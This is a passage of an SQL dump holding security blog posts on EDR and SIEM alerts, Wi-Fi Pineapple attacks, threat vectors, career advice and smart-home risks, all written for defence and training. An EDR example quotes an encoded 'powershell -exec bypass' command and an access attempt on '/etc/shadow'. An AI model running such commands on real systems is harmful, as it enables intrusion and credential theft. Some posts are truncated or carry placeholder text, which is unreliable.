from both an offensive and defensive standpoint. While hackers will continue to exploit AI to create sophisticated cyberattacks, the same technology offers powerful solutions to thwart them.\n\nThe best way forward is for businesses and organizations to adopt AI-driven cybersecurity tools, invest in advanced threat intelligence systems, and remain vigilant in updating their defenses. When used responsibly, AI isn’t just a challenge to overcome; it’s the key to staying ahead in an increasingly complex digital world.\n\nTo safeguard your organization against AI-powered cyber threats, start exploring AI-driven cybersecurity solutions today. The future of digital safety depends on your readiness to adapt and protect.', '', 'http://infoseclabs.io/uploads/1767499156712-998648028.png', NULL, 1, 'published', '2026-01-07 02:58:00', '2026-01-07 18:18:38', 'Information Security', 'AI-Powered Cyberattacks: Hackers & Machine Learning', 'Discover how AI is transforming cyberattacks and learn strategies to protect against these sophisticated threats.', 'AI cyberattacks'), (8, 'Security Tools vs. Manual Investigation: Building a Balanced Cybersecurity Professional', 'security-tools-vs-manual-investigation-building-a-balanced-cybersecurity-professional', '# Balancing Tools and Manual Skills in Cybersecurity\n\nCybersecurity is one of the most dynamic fields in the modern workforce, where threats evolve as quickly as the technology designed to counter them. This creates a significant challenge for cybersecurity professionals to continuously refine their skills and adapt to new methodologies. A long-standing debate in the field centers around whether professionals should focus on mastering security tools or prioritize honing their manual investigation skills.\n\nThe truth is, to become a well-rounded cybersecurity professional, it\'s not about choosing between the two but striking the right balance. This blog will explore the strengths and limitations of relying on tools, the irreplaceable value of manual investigation, and how blending these approaches can prepare you to thrive in this fast-paced field.\n\n## The Role of Security Tools in Cybersecurity\n\nSecurity tools are indispensable for automating complex tasks, ensuring faster detection and response, and providing organizations with a robust line of defense. Today\'s advanced tools have revolutionized cybersecurity by adding scalability, speed, and near real-time insights.\n\n### Key Tools Empowering Cybersecurity Professionals\n\n1. **Security Information and Event Management (SIEM):** SIEM tools such as Splunk and IBM QRadar analyze logs and events across an organization\'s IT environment, providing centralized visibility over network activity.\n2. **Intrusion Detection and Prevention Systems (IDS/IPS):** Tools like Snort and Suricata scan for suspicious traffic patterns to prevent network intrusions.\n3. **Vulnerability Scanners:** Solutions like Nessus and Rapid7 Nexpose identify weak points in your network that attackers might exploit.\n4. **Endpoint Detection and Response (EDR):** Tools like CrowdStrike and SentinelOne monitor endpoint behavior to detect anomalies and prevent breaches.\n\n### Benefits of Security Tools\n\nSecurity tools bring speed and efficiency to tasks that would take hours or even days if performed manually. They excel at:\n\n- **Threat Detection:** Automating the detection of malware or unusual activity, greatly reducing response times.\n- **Log Management:** Consolidating log data from multiple sources for easier monitoring.\n- **Reducing Errors:** Tools minimize human errors by providing consistent, algorithm-based processes.\n- **Scalability:** Tools handle large datasets and adapt to growing organizations with minimal additional labor.\n\nHowever, as powerful as these tools are, their limitations mean they can\'t be the sole focus for cybersecurity professionals.\n\n## The Importance of Manual Investigation Skills\n\nSecurity tools cannot replace the expertise, critical thinking, and intuition of a human investigator. Their reliance on predefined rules and algorithms makes them vulnerable to bypasses, misconfiguration, or outright failures.\n\n### Core Manual Investigation Techniques\n\n1. **Log Analysis:** Reviewing raw data from logs can uncover nuanced patterns and anomalies that automated tools may miss.\n2. **Network Traffic Analysis:** Manually inspecting network packets with tools like Wireshark helps you understand intricate details about suspicious traffic.\n3. **Malware Analysis:** Analyzing malicious files through static and dynamic means (e.g., decompiling code or sandbox testing) can help determine their capabilities and origins.\n4. **Behavioral Analysis:** Looking for deviations from expected behavior within user or system interactions often requires human insight.\n\n### Why Manual Skills Matter\n\n- **Complex Threats:** Cyberattacks are becoming increasingly sophisticated, and manual analysis is often required to understand advanced tactics, techniques, and procedures (TTPs).\n- **False Positives:** Over-reliance on tools can lead to missed legitimate activity being misclassified as malicious or vice versa. Human judgment is vital for distinguishing between the two.\n- **Incident Response:** When tools fail or are rendered inoperable by attackers, skilled cybersecurity professionals step in to contain, investigate, and resolve issues.\n\nBy investing in manual skills, professionals not only enhance their problem-solving capabilities but also ensure that their expertise remains irreplaceable.\n\n## Striking a Balance Between Tools and Manual Expertise\n\nThe ultimate goal for cybersecurity professionals is not about choosing one approach over the other but knowing when and how to combine both effectively. Here\'s why a blended approach works best:\n\n- **Efficiency with Tools:** Tools save time by automating repetitive tasks, letting professionals focus their manual expertise on more intricate issues.\n- **Human Judgment as a Safety Net:** Professionals must validate and interpret the data generated by tools to avoid decision-making based on incomplete or misleading information.\n- **Incident Adaptability:** While tools operate by predefined rules, humans can creatively adapt to situations.\n\nBy using security tools as extensions of their own ability—not replacements for it—professionals can maximize their impact.\n\n## Incident Response Scenario\n\nImagine this scenario: Your Security Information and Event Management (SIEM) system, which usually alerts your team of potential intrusions, has failed due to a technical error. At the same time, one of your endpoints begins acting suspiciously, potentially signaling a breach. What do you do?\n\n**Step 1 – Activate the Incident Response Plan:**\n\nInitiate the pre-established incident response plan (IRP). Begin by identifying the team members who need to be involved and delegating tasks to ensure a structured approach.\n\n**Step 2 – Collect Logs and Evidence:**\n\nSince the SIEM system is down, manually retrieve event logs from key systems (e.g., network firewalls, servers, and endpoint devices). Verify any discrepancies or unusual activity.\n\n**Step 3 – Conduct a Manual Investigation:**\n\nUse tools like Wireshark to manually analyze network traffic from suspicious endpoints. Perform behavioral analysis to identify patterns of attack.\n\n**Step 4 – Contain and Mitigate:**\n\nIsolate impacted systems from your network to prevent escalation. Apply containment measures, such as endpoint quarantine or restricting user permissions.\n\n**Step 5 – Eradication and Recovery:**\n\nRemove the threat manually by using advanced techniques like malware removal tools or system rollbacks. Restore all systems to their functional state and monitor them for lingering threats.\n\nThis scenario highlights how security tools provide convenience but how manual investigation remains critical when tools fail.\n\n## Best Practices for Professional Development\n\nTo become an effective cybersecurity professional capable of balancing tools and manual skills, consider the following:\n\n- **Certifications and Training:**', '', 'http://infoseclabs.io/uploads/1767499299723-760685997.png', NULL, 1, 'draft', '2026-01-09 11:01:00', '2026-01-04 07:02:42', 'Information Security', 'Security Tools vs. Manual Skills: Cybersecurity Balance', 'Discover how to balance security tools and manual investigation skills for a comprehensive cybersecurity approach.', 'Cybersecurity Balance'), (9, 'Wi-Fi Pineapple: A Comprehensive Guide to Network Security and Threat Prevention', 'wi-fi-pineapple-a-comprehensive-guide-to-network-security-and-threat-prevention', '# Understanding Wi-Fi Pineapple: A Cybersecurity Perspective\n\nWhen you hear the term \"Wi-Fi Pineapple,\" you might picture a tropical fruit connected to your network. However, in the cybersecurity world, this device is far from sweet. Wi-Fi Pineapples are powerful tools designed for network auditing, but in the wrong hands, they can be used for malicious purposes.\n\nThis blog will break down what a Wi-Fi Pineapple is, how it works (with a focus on MITM attacks), real-world scenarios where these devices have been exploited, and effective security measures to protect yourself. By the end, you\'ll have a deeper understanding of this tool and how to stay one step ahead of potential attackers.\n\n## What Is a Wi-Fi Pineapple?\n\nA Wi-Fi Pineapple is a device created by Hak5, a company known for its ethical hacking training tools. Originally built to assist network administrators and penetration testers, the Pineapple allows users to monitor, analyze, and test wireless networks.\n\nEssentially, it acts as a device that can simulate rogue Wi-Fi networks and mimic legitimate access points (APs). It can capture data, intercept information, and probe vulnerabilities in a network’s security framework. While its ethical use is significant in network auditing and cybersecurity testing, these devices can also be exploited by hackers for nefarious purposes.\n\n## How Wi-Fi Pineapple Works: Man-in-the-Middle (MITM) Attacks Explained\n\nOne of the most dangerous features of the Wi-Fi Pineapple is its ability to facilitate a **man-in-the-middle (MITM) attack** seamlessly. Here’s how it works:\n\n### Step 1: Mimicking Legitimate Wi-Fi Networks\n\nWi-Fi Pineapples scan the area for Wi-Fi AP names and automatically respond to connection requests. Many unsuspecting devices, such as laptops and smartphones, are programmed to automatically reconnect to familiar Wi-Fi names (e.g., \"Starbucks_Free_WiFi\"). The Pineapple responds as the “strongest” signal impersonating that AP.\n\n### Step 2: Capturing Data\n\nWhen a victim connects to the Pineapple, their internet traffic can be intercepted. Attackers can collect sensitive data such as login credentials, session cookies, and even browsing activity.\n\n### Step 3: Deploying Attacks\n\nDuring MITM attacks, bad actors can:\n\n- Redirect users to malicious websites to steal information.\n- Inject malware into HTTP traffic.\n- Uncover intricate details of unencrypted connections.\n\nThe result? Your personal and professional data is captured without your knowledge, and in unsecured networks, this risk skyrockets.\n\n## Different Wi-Fi Pineapple Models and Their Features\n\nHak5 currently offers several models of Wi-Fi Pineapple devices, catering to both beginner and advanced users. Below are the most popular models:\n\n### 1. Wi-Fi Pineapple Nano\n\n- Portable yet powerful\n- Best for on-the-go network assessments\n- Budget-friendly, making it accessible to beginners\n\n### 2. Wi-Fi Pineapple Tetra\n\n- Dual radio capabilities\n- Handles multiple wireless clients simultaneously\n- Perfect for advanced penetration testing setups\n\n### 3. Enterprise Solutions\n\n- High-level auditing programs customized for corporate needs\n- More security and control for ethical usage\n\nEach model includes rich features like packet sniffing, victim profiling, and additional plugins to enhance adaptability. However, these tools also make them dangerous if exploited.\n\n## Real-World Scenarios of Pineapple Attacks\n\nWi-Fi Pineapples pose significant threats to any environment where Wi-Fi is accessible. Here are real-world examples to illustrate how they’ve been used:\n\n### 1. Coffee Shop Surveillance\n\nA cybercriminal sits in a coffee shop with their Wi-Fi Pineapple. As customers connect to what they believe is the café\'s free Wi-Fi, the attacker intercepts login credentials for banking apps and social media platforms.\n\n### 2. Corporate Espionage\n\nAttackers impersonate a secure office network, tricking employees into connecting to their rogue AP. This enables the attacker to exfiltrate sensitive corporate data.\n\n### 3. Conference Exploits\n\nLarge public events such as tech conferences present easy targets. Attendees connect to what they think is the event Wi-Fi. Hackers use Pineapples to inject malicious programs or monitor unencrypted emails.\n\nThese examples indicate how a seemingly innocuous device can disrupt personal security and corporate networks alike.\n\n## Best Practices for Protection: Security Measures and Tools\n\nFortunately, you can protect yourself and your organization from Wi-Fi Pineapple-enabled attacks. Implement the following best practices:\n\n### 1. Avoid Public Wi-Fi Whenever Possible\n\nPublic networks lack security and make you vulnerable to rogue APs. Use your mobile hotspot or a known secure network instead.\n\n### 2. Use a VPN\n\nA Virtual Private Network (VPN) encrypts your internet traffic. Even if an attacker intercepts it, they won’t be able to decipher sensitive data.\n\n### 3. Beware of Rogue APs\n\nTurn off auto-connect to networks in your device’s settings. Manually verify the legitimacy of Wi-Fi networks before connecting.\n\n### 4. Enable HTTPS\n\nEnsure that every website you visit uses HTTPS encryption. Tools like HTTPS Everywhere (a browser extension) enforce this, creating a secure connection.\n\n### 5. Add Strong Endpoint Protection\n\nInstall antivirus and antimalware programs across your devices. Many endpoint security tools alert you to suspicious activity initiated by MITM tactics.\n\n### 6. Educate Employees\n\nFor businesses, invest in cybersecurity awareness training. Equip employees to recognize phishing schemes and rogue AP strategies.\n\n### 7. Use MAC Address Filtering\n\nOn sensitive networks, permit access only to known devices using MAC address filtering. While not foolproof, it’s another layer of security.\n\nBy following these tactics, individuals and companies can significantly reduce vulnerabilities.\n\n## The Future of Wi-Fi Security and Pineapple Devices\n\nWhile devices like the Wi-Fi Pineapple are unlikely to disappear anytime soon, advancements in network security continue to evolve:\n\n- **Wi-Fi 6 Encryption**: New standards, such as WPA3 in Wi-Fi 6, aim to improve encryption and prevent data sniffing.\n- **AI-Driven Security**: Automated threat detection using artificial intelligence can monitor network traffic in real-time for suspicious activities.\n\nThese advancements promise a more secure future in the face of evolving threats.', '', 'http://infoseclabs.io/uploads/1767499500376-718819269.png', NULL, 1, 'published', '2026-01-06 11:04:00', '2026-01-08 01:43:04', 'Projects', 'Protect Yourself from Wi-Fi Pineapple Attacks', 'Learn how to safeguard against Wi-Fi Pineapple attacks with effective security measures and insights into MITM threats.', 'Wi-Fi Pineapple'), (10, 'Top EDR Alerts Every Organization Encounters and How to Handle Them', 'top-edr-alerts-every-organization-encounters-and-how-to-handle-them', '# Understanding Endpoint Detection and Response (EDR) Alerts\n\nEndpoint Detection and Response (EDR) is a critical component of modern cybersecurity strategies. With the rise of sophisticated cyber threats targeting endpoints such as laptops, servers, and mobile devices, EDR tools help detect, analyze, and respond to potential risks in real-time. However, managing EDR alerts can often feel overwhelming due to the sheer volume of notifications generated in an enterprise environment.\n\nThis post explores the most common categories of EDR alerts, provides examples of key alerts organizations typically encounter, and shares best practices for analyzing, prioritizing, and responding effectively. Whether you\'re a security analyst working in a SOC or an IT professional overseeing endpoint security, this guide will help you navigate the EDR alert landscape with confidence.\n\n## Why EDR Alerts Matter\n\nWhy are EDR alerts so critical to an organization\'s security posture? Simply put, endpoints are common entry points for attackers. Malicious actors often use techniques such as phishing emails, malware, or compromised credentials to gain access to endpoints before moving laterally across a network.\n\nEDR tools monitor endpoint activities, log suspicious behaviors, and send alerts when potential threats are detected. These alerts highlight risks such as malware infections, unauthorized file access, and anomalous network behavior. Ignoring or mismanaging these alerts could allow attackers to escalate their operations undetected, causing significant damage to your business.\n\n## Common EDR Alert Categories\n\nTo efficiently manage EDR alerts, it’s important to first understand their key categories. These alerts typically fall under the following types:\n\n### Malware Detection\n\nAlerts related to known or suspected malware activity, such as ransomware, trojans, or spyware. These often stem from signature-based detections or anomalous behaviors.\n\n### Suspicious Process Execution\n\nAlerts generated when an unusual or unauthorized process runs on an endpoint. Examples include PowerShell abuse or launching a process from unexpected directories.\n\n### Unusual User Behavior\n\nBehavioral anomalies such as a user accessing sensitive data at unusual hours or failed login attempts from unfamiliar locations often trigger alerts.\n\n### File Integrity Variations\n\nActivities such as unauthorized changes, additions, or deletions of critical system files or registries send file integrity alerts. These can indicate attempts to tamper with systems.\n\n### Network Anomalies\n\nUnusual traffic patterns between endpoints or outbound connections to suspicious external IP addresses result in network-related alerts.\n\n### Privilege Escalation Attempts\n\nAlerts flag actions where a user or process attempts to gain elevated access privileges without authorization.\n\n## Top EDR Alert Examples\n\nLet\'s take a closer look at specific EDR alert examples and their significance in an enterprise security environment.\n\n### Example 1: Ransomware Behavior Detected\n\n- **Alert Description**: Files are being renamed with “.encrypted” extension, indicating potential ransomware activity.\n- **Details**:\n - Process Name: `encryptor.exe`\n - Detected Behavior: Mass file encryption in user directories.\n - Host Machine: `Workstation-22`\n- **Action Required**:\n - Isolate the endpoint immediately.\n - Identify the ransomware strain and retrieve backups.\n - Perform a root-cause analysis to prevent recurrence.\n\n### Example 2: PowerShell Command-Line Anomaly\n\n- **Alert Description**: Unusual PowerShell script execution detected on server.\n- **Details**:\n - Command Line Argument: `powershell -exec bypass -enc [Base64 encoded payload]`\n - User Account: `admin_temp`\n - Timestamp: `2024-03-14 11:23 PM`\n- **Action Required**:\n - Investigate execution context and user activity.\n - Reverse engineer the encoded payload to detect malicious intent.\n\n### Example 3: Unauthorized Administrator Access\n\n- **Alert Description**: A non-admin user attempted to access privileged directories.\n- **Details**:\n - Affected Directory: `/etc/shadow`\n - Failed Logins Detected: 5 attempts\n - Source IP Address: `192.168.1.45`\n- **Action Required**:\n - Lock the user\'s account temporarily.\n - Analyze source IP activity for brute-force attack patterns.\n\n### Example 4: Outbound Connection to Known Malicious IP\n\n- **Alert Description**: Host attempted to contact a blacklisted external IP address.\n- **Details**:\n - (Further details would be provided here, but they were cut off in the original content.)\n\nUnderstanding these alerts and their implications can significantly enhance an organization\'s ability to protect its network infrastructure. Properly responding to EDR alerts ensures that potential threats are mitigated swiftly, reducing the risk of significant breaches.', '', 'http://infoseclabs.io/uploads/1767499662544-499873320.png', NULL, 1, 'draft', '2026-01-10 11:06:00', '2026-01-04 07:08:00', NULL, 'Top EDR Alerts & Solutions for Organizations', 'Discover common EDR alerts and learn effective strategies to manage and respond to them, ensuring robust endpoint security.', 'EDR Alerts'); INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES (11, 'Mastering SIEM Alerts: A Guide to Effective Management and Optimization', 'mastering-siem-alerts-a-guide-to-effective-management-and-optimization', '# Understanding and Managing SIEM Alerts\n\nSecurity Information and Event Management (SIEM) systems are foundational tools in modern cybersecurity. They provide critical insights into an organization\'s environment by collecting, analyzing, and prioritizing data from various sources. However, one of the main challenges for security analysts and Security Operations Center (SOC) teams is managing the sheer volume of alerts generated daily.\n\nThis post explores the most common SIEM alerts organizations encounter, including examples of critical alerts and how to prioritize, manage, and optimize your SIEM system effectively.\n\n## What Are SIEM Alerts and Why Are They Important?\n\nSIEM alerts are notifications generated by a SIEM system when it detects activity that matches preconfigured rules or anomalies in the monitored environment. These alerts help security teams address potential threats swiftly, thereby minimizing risks to the organization.\n\n### Why SIEM Alerts Matter\n\n- **Real-Time Threat Detection**: Alerts identify security incidents like network intrusions or unauthorized access as they occur.\n- **Less Downtime**: Early warning systems reduce the time to resolve critical vulnerabilities.\n- **Compliance**: SIEM tools help organizations meet regulatory requirements by providing detailed logging and reporting.\n\nWithout proper alert management, these tools can easily overwhelm teams with noise, making it challenging to differentiate true cyber threats from false positives.\n\n## Common Types of SIEM Alerts Organizations Receive\n\nSIEM systems can monitor a wide range of events, but certain types of alerts are more prevalent across organizations. Below are some categories that security analysts commonly encounter:\n\n### 1. Failed Login Attempts\n\n- **Why It Happens**: A user attempts to log in multiple times with incorrect credentials.\n- **Risk**: This often indicates a brute-force attack or an insider threat attempting unauthorized access.\n- **Example**: Multiple failed logins across different accounts within a short time frame.\n\n### 2. Unusual User Behavior\n\n- **Why It Happens**: A user deviates from their normal login patterns (e.g., accessing resources at odd hours).\n- **Risk**: A compromised account or insider threat.\n- **Example**: An employee who typically works in New York is suddenly logging in from an IP address in Eastern Europe at 3 AM.\n\n### 3. Malware Detection\n\n- **Why It Happens**: Malware signatures are detected on a workstation or server.\n- **Risk**: The malware could spread laterally across networks and exfiltrate data.\n- **Example**: A SIEM tool picks up logs from your antivirus software indicating the presence of files matching known ransomware hashes.\n\n### 4. Privilege Escalation Attempts\n\n- **Why It Happens**: Users or processes attempt to gain administrative privileges.\n- **Risk**: Privilege escalation is often an early step in more complex attacks like ransomware.\n- **Example**: A standard user suddenly tries to execute administrative commands without prior approval.\n\n### 5. Data Exfiltration\n\n- **Why It Happens**: Large volumes of sensitive data are transferred outside the organization’s internal network.\n- **Risk**: A clear sign of insider threats or external breaches.\n- **Example**: A file server sending gigabytes of data to an unknown external IP over a short duration.\n\n### 6. Unauthorized Access to Critical Systems\n\n- **Why It Happens**: Access attempts to systems housing sensitive data outside of permissible roles or hours.\n- **Risk**: A sign of malicious insider activity or an attacker leveraging stolen credentials.\n- **Example**: A user account attempts to access a database server containing financial records without prior authorization.\n\n### 7. Denial-of-Service (DoS) Attack Indicators\n\n- **Why It Happens**: A spike in network traffic results in a server becoming unresponsive.\n- **Risk**: Disruption of operations, affecting customer experience and internal workflows.\n- **Example**: Your SIEM correlates logs pointing to unusually high traffic originating from multiple IP addresses targeting a single web server.\n\n### 8. Suspicious File Modifications\n\n- **Why It Happens**: Critical system files are unexpectedly modified.\n- **Risk**: Could indicate ransomware encrypting files or malware embedding payloads.\n- **Example**: Unauthorized changes to key registry settings or .bat and .dll files.\n\nEach of these alerts represents distinct threats that require prompt investigation and action. However, not all alerts are created equal, and some demand more immediate attention than others.\n\n## How to Effectively Manage and Prioritize SIEM Alerts\n\nManaging SIEM alerts is like trying to sip from a firehose; you need a strategy to get the good out of it without being drowned by excessive information. Here’s how you can effectively manage and prioritize alerts:\n\n1. **Categorize Alerts by Severity**\n - Divide alerts into categories such as critical, high, medium, and low based on the level of potential risk.\n - For example, failed login attempts might be \"low priority\" unless they are widespread, while detected ransomware is \"critical.\"\n\nBy understanding and categorizing alerts effectively, security teams can focus on the most significant threats and ensure timely responses to protect their organizations.', '', 'http://infoseclabs.io/uploads/1767501764296-302552087.png', NULL, 1, 'published', '2026-01-06 07:43:00', '2026-01-06 16:10:10', 'Information Security', 'Top SIEM Alerts Organizations Face', 'Discover common SIEM alerts, their impact, and strategies to manage them effectively for enhanced cybersecurity.', 'SIEM alerts'), (12, 'How Cyber Threats Infiltrate: Insight into Digital Security Risks', 'how-cyber-threats-infiltrate-insight-into-digital-security-risks', '# Navigating the Digital Threat Landscape\n\nThe digital world is buzzing with activity. Everywhere we go, invisible connections through Wi-Fi, Bluetooth, and other technologies surround us. However, lurking within that mix are sneaky cyber threats waiting for an opportunity to strike. Understanding how hackers exploit vulnerabilities in our digital lives is key to staying ahead of them.\n\nThis blog dives into common threat vectors and attack surfaces, breaking down how cyber threats operate and, more importantly, how you can protect yourself.\n\n## The Sneaky World of Threat Vectors\n\n### Messages as a Gateway\n\nMessages might seem harmless, but they can open doors for hackers. Emails, for example, are one of the oldest and most common ways attackers exploit our trust in digital communication.\n\n- **Phishing** works by tricking users into clicking malicious links or sharing sensitive information, often by imitating trusted sources like banks or tax authorities.\n- **Smishing** is the SMS version of phishing, where attackers send texts posing as delivery companies or other trusted entities, aiming to con you into revealing private details or downloading malware.\n- Even **instant messaging apps** with better security measures like end-to-end encryption aren\'t immune. Hackers may use infected files or social engineering tactics to compromise users.\n\n### Images Aren’t Always Innocent\n\nThink that image file is harmless? Think again. Hackers embed malicious code into image files, turning them into digital Trojan horses. Once opened, these files can trigger harmful actions like releasing ransomware or stealing your data.\n\n### Files Are Dangerous When Tampered With\n\nEvery file exchanged online, from documents to spreadsheets, could potentially carry malicious software. When you open an infected file, attackers can exploit weaknesses in your device to steal data, take over your system, or launch other forms of attack.\n\n### Voice Calls Can Be a Threat\n\nPhones haven\'t escaped the reach of cybercriminals. **Vishing** (voice phishing) tricks unsuspecting individuals by using caller ID spoofing to look like legitimate entities, such as your bank. Through convincing conversations, attackers aim to extract sensitive details like passwords or financial data.\n\n### Your USB Could Be a Trap\n\nUSB drives might seem innocuous, but they can act as digital landmines. Plugging in a tampered USB stick can spread malware to your system. Sometimes, hackers leave infected drives in public places, counting on curiosity to do the rest.\n\n## Vulnerable Software: An Open Invitation for Hackers\n\nOld or unpatched software is like having holes in the walls of your digital fortress. Vulnerabilities in software—from coding errors to outdated versions without security updates—can be exploited, enabling attackers to breach systems and steal sensitive data.\n\nOrganizations must regularly manage updates and patches to seal these vulnerabilities. Tools like **vulnerability scanners** proactively identify and address these gaps before hackers can exploit them.\n\n### Agent-Based vs. Agentless Scanning\n\n- **Agent-Based Scanning** installs software on devices to detect vulnerabilities and report them back to a central server.\n- **Agentless Scanning** requires no software installation but uses tools like Nmap and Wireshark to remotely scan systems.\n\nHackers often favor agentless methods for reconnaissance since they leave no traces, underscoring the need for organizations to scan their systems first.\n\n## Key Takeaways to Stay Secure\n\nUnderstanding how hackers exploit vulnerabilities allows you to stay vigilant and build strong defenses. Here are some tips to protect yourself online:\n\n- Always verify messages before clicking links or sharing information.\n- Use security software to detect hidden malicious code in files and images.\n- Keep all software up-to-date to patch vulnerabilities.\n- Never plug in USB drives you find in public places.\n- Be cautious of phone calls from unverified sources, even if they appear familiar.\n\nCybercriminals are constantly evolving their tactics, but with proactive measures, you can safeguard your digital life from their threats.', '', 'http://infoseclabs.io/uploads/1767560795113-590336718.png', NULL, 1, 'published', '2026-01-04 16:06:00', '2026-01-05 00:07:33', 'Information Security', 'How Cyber Threats Infiltrate Digital Security', 'Explore how cyber threats operate and learn strategies to protect yourself from digital security risks.', 'Cyber Threats'), (13, 'Breaking Into Cybersecurity: A Realistic Guide for Aspiring Professionals', 'breaking-into-cybersecurity-a-realistic-guide-for-aspiring-professionals', '# Breaking into Cybersecurity: A Realistic Guide\n\nEntering the field of cybersecurity is one of the most exciting career paths in technology, but it’s not without its challenges. Many aspiring professionals start with the misconception that simply studying cybersecurity concepts, watching tutorials, or earning certificates will guarantee them a high-paying job in just a few months. While some may stumble upon opportunities, for most, the reality is far more demanding. This blog post will break down the common missteps and guide you on how to effectively pave your way into the cybersecurity world.\n\n## The Problem with \"Study-Only\" Approaches\n\nOne of the biggest mistakes beginners make is focusing solely on learning concepts from college courses, books, or tutorials without applying them. Memorizing cybersecurity principles may give you a theoretical understanding, but it doesn’t equate to the hands-on experience that employers are looking for.\n\nThis phenomenon can leave you in what’s called \"learning purgatory.\" You might know all the right terminology and theories, but you’ll stumble when it’s time to apply your knowledge in a real-world scenario.\n\n**Reality check:** To stand out in interviews and secure your first cybersecurity role, you must demonstrate practical, hands-on experience. Employers want to see proof that you can not only explain cybersecurity concepts but also implement and troubleshoot them in real scenarios.\n\n## The Misleading Perception of \"Easy Tech Jobs\"\n\nWe\'ve all seen videos that glamorize tech jobs, making it seem like professionals spend their days sipping coffee, playing video games, and working out between 10-minute meetings. While entertaining, these portrayals create a false perception that tech jobs, including cybersecurity, are effortless to attain and maintain.\n\nTrue cybersecurity work involves rolling up your sleeves and getting your hands dirty with problem-solving, configuring systems, and handling unexpected errors. The path to landing a well-paying cybersecurity role is challenging and requires resilience, patience, and consistent effort.\n\n## Two Big Challenges to Overcome\n\nAnyone aspiring to break into cybersecurity faces two major hurdles:\n\n1. **Landing interviews.**\n2. **Securing the actual job after interviews.**\n\nThese are two entirely different challenges, each requiring a tailored approach. For interviews, you need to showcase a blend of knowledge and practical expertise. For the role itself, you must demonstrate your readiness to tackle real-world cybersecurity challenges.\n\n## How to Learn Cybersecurity the Right Way\n\nHere’s what sets successful cybersecurity professionals apart from those stuck in \"learning purgatory\":\n\n### 1. Focus on Practical, Hands-On Experience\n\nLearning about concepts like reverse shells is good. However, the true value lies in implementing these concepts:\n\n- Set up a lab environment at home with a server and endpoints.\n- Simulate real attacks and defense mechanisms, such as detecting reverse shells.\n- Deploy tools like a SIEM (Security Information and Event Management system) to learn how to monitor and defend against threats.\n\nThe more you work hands-on, the more these experiences will become ingrained, making them easier to recall during an interview or on the job.\n\n### 2. Start Small and Build Gradually\n\nYou don’t need to master complex tools like a SIEM or curate detection rules for your first entry-level cybersecurity job. Start small:\n\n- Learn the fundamentals of networking and cybersecurity basics.\n- Apply what you learn with simple projects, like setting up a basic firewall or analyzing traffic logs.\n- Gradually take on more challenging projects as your skills improve.\n\n### 3. Learn Through Troubleshooting\n\nMistakes are where the real learning happens. When setting up tools or environments, you’ll inevitably encounter errors. Instead of getting frustrated, use these moments to learn:\n\n- Debugging errors will teach you valuable lessons about system interaction.\n- Documentation and reading forums like Stack Overflow will become second nature.\n\n### 4. Understand the Value of Repetition\n\nRepetition is vital for mastering cybersecurity skills. If you’re learning about reverse shells, practice setting them up repeatedly until you could do it in your sleep. This kind of muscle memory will help you stand out in interviews and on the job.\n\n### 5. Utilize Learning Platforms\n\nToday, you have access to an abundance of affordable and comprehensive learning platforms:\n\n- **TryHackMe**\n- **Hack The Box**\n- **Key cyber labs**\n\nUse these platforms to perform practical exercises, submit findings, and gain experience in simulated environments.\n\n### 6. Be Persistent\n\nBreaking into cybersecurity takes more time and effort than many expect. Prepare to apply for numerous jobs, undergo multiple interview rounds, and continually build your skills. Persistence is key.\n\n## Hands-On Cybersecurity Examples\n\nTo put this into perspective, here’s a practical project you can work on:\n\n- **Reverse Shells:** Learn how attackers use reverse shells to execute code remotely.\n - Set up an attack server and a victim machine.\n - Simulate a reverse shell attack in your lab.\n - Create detection rules for the reverse shell in your SIEM and test their effectiveness.\n\nThis project, while challenging, will give you unparalleled insights into how attacks work and what defenders need to do to stop them. Projects like these also provide valuable talking points for interviews.\n\n## The Importance of Realistic Expectations\n\nIt’s important to acknowledge that cybersecurity is not an easy field to break into, but it’s far from impossible. It requires:\n\n- Time\n- Consistent effort\n- Real-world, hands-on experience\n\nThere’s no shortcut or three-month boot camp that will magically land you a six-figure cybersecurity role. The candidates who stand out are the ones who actively apply what they learn, build on their skills, and remain patient in their job search.\n\n## Final Words of Advice\n\nIf you’re serious about a career in cybersecurity, here’s your priority list:\n\n1. Stop consuming endless videos and focus on practical work.\n2. Build projects, test exploits, and document your findings.\n3. Apply for jobs with a portfolio that demonstrates your skills.\n4. Be resilient, patient, and committed to learning.', '', 'http://infoseclabs.io/uploads/1767564505851-906926040.jpg', 'Aspiring cybersecurity professional learning from practical experience', 1, 'published', '2026-01-04 17:08:00', '2026-01-05 01:08:41', 'Information Security', 'Guide: Break into Cybersecurity Successfully', 'Discover realistic steps to enter cybersecurity, overcome challenges, and gain practical experience.', 'Cybersecurity career'), (14, 'The Rise of Smart Homes: Convenience Meets Security Concerns', 'the-rise-of-smart-homes-convenience-meets-security-concerns', '# The Reality of Smart Home Security\n\nSmart homes are no longer a futuristic dream; they are now a part of everyday life. From smart thermostats and security cameras to voice assistants and lights you can control with your phone, the Internet of Things (IoT) has redefined how we live. It allows us to experience unprecedented convenience, energy efficiency, and connectivity within our homes.\n\nBut with this new convenience comes a growing question that tech enthusiasts and security-conscious consumers alike are grappling with: **Are smart homes truly safe?** IoT devices, while innovative, have inherent vulnerabilities that can expose your personal life to hackers and cybercriminals.\n\nThis post dives into the often-overlooked risks of IoT security, real-world examples of breaches, expert insights, and actionable steps to keep your smart home safe. By the end, you will have a clear understanding of the challenges and proactive measures needed to make your smart home smarter _and_ safer.\n\n## Understanding IoT Security Risks\n\nIoT devices, at their core, are compact computers linked through networks. These devices communicate data across the web, enabling seamless smart home automation. However, this connectivity is also their Achilles\' heel, making IoT devices prime targets for cyberattacks.\n\nHere are the most common vulnerabilities you should know about:\n\n### 1. Weak Passwords\n\nMany IoT devices come with factory-set passwords that are either easy to guess (e.g., \"admin\" or \"password123\") or shared across multiple devices. If left unchanged, these passwords act as an open invitation for hackers.\n\n### 2. Unencrypted Communication\n\nNot all IoT devices encrypt their data during transmission. This means sensitive information, like login credentials or video footage, could be intercepted by skilled attackers when communicated over networks.\n\n### 3. Lack of Software Updates\n\nIoT manufacturers often rush devices to market without a robust plan for updates. Without regular software patches, these devices remain vulnerable to emerging threats. A 2020 survey by Symantec showed that over 60% of IoT devices run outdated or insecure firmware.\n\n### 4. Universal Plug and Play (UPnP)\n\nWhile UPnP facilitates device interconnectivity, it can make devices visible to the internet, leaving them susceptible to unauthorized access. Think of it as leaving your front door unintentionally unlocked.\n\n### 5. Network 